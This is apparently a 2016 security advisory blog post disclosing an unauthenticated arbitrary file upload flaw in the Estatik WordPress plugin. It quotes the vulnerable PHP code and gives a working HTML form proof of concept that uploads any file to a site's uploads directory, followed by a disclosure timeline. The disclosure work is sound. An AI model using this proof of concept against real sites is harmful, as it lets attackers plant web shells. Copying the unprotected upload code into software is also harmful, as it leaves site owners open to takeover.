1 Aug 2016

Arbitrary File Upload Vulnerability in Estatik

As we continue to review old third-party data on hacking attempts to identity more vulnerabilities that hackers have likely already discovered in WordPress plugins we spotted an arbitrary file upload vulnerability in the plugin Estatik.

Back in June of last year a request was made for the file /wp-content/plugins/estatik/front_templates/css/es_front_responsive.css, for what was likely a probe for usage of the plugin before exploiting it. Looking over that plugin for any obvious issues we found that in the current version of it, 2.2.5, a file upload capability is accessible without being logged, despite only being intended to be accessed by users logged in as Administrators.

The issue starts with the function es_prop_media_images() being made accessible through WordPress AJAX functionality to those not logged in (in the file /admin_template/es_property/es_property_functions.php):

231
add_action('wp_ajax_nopriv_es_prop_media_images', 'es_prop_media_images');

In that function the following code saves an uploaded file sent with a request to the AJAX function

131
132
133
134
135
136
137
$image_name = time()."_".$_FILES['es_media_images']['name'][$i];
 
$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];  
 
$targetPath = $upload_dir['path']."/".$image_name;
 
move_uploaded_file($sourcePath,$targetPath) ;

Proof of Concept

The following proof of concept will upload the selected  file and put it in the current month’s directory inside of the /wp-content/uploads/ directory. The name of the file in the upload directory with be the time the file was saved as output by the function time() followed by a “_” and then name of the as it was uploaded.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" /> 
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 7/25/2016 – Developer notified.
  • 8/1/2016 – WordPress.org Plugin Directory notified.
  • 8/1/2016 – WordPres.org Plugin Directory removes plugin.
  • Week of 8/14/2016 – Version 2.3.0 released, which fixes vulnerability, but leaves a lesser vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

One thought on “Arbitrary File Upload Vulnerability in Estatik

  1. Pingback: August 2016 WordPress Core, Plugins & Themes Vulnerabilities

Leave a Reply

Your email address will not be published.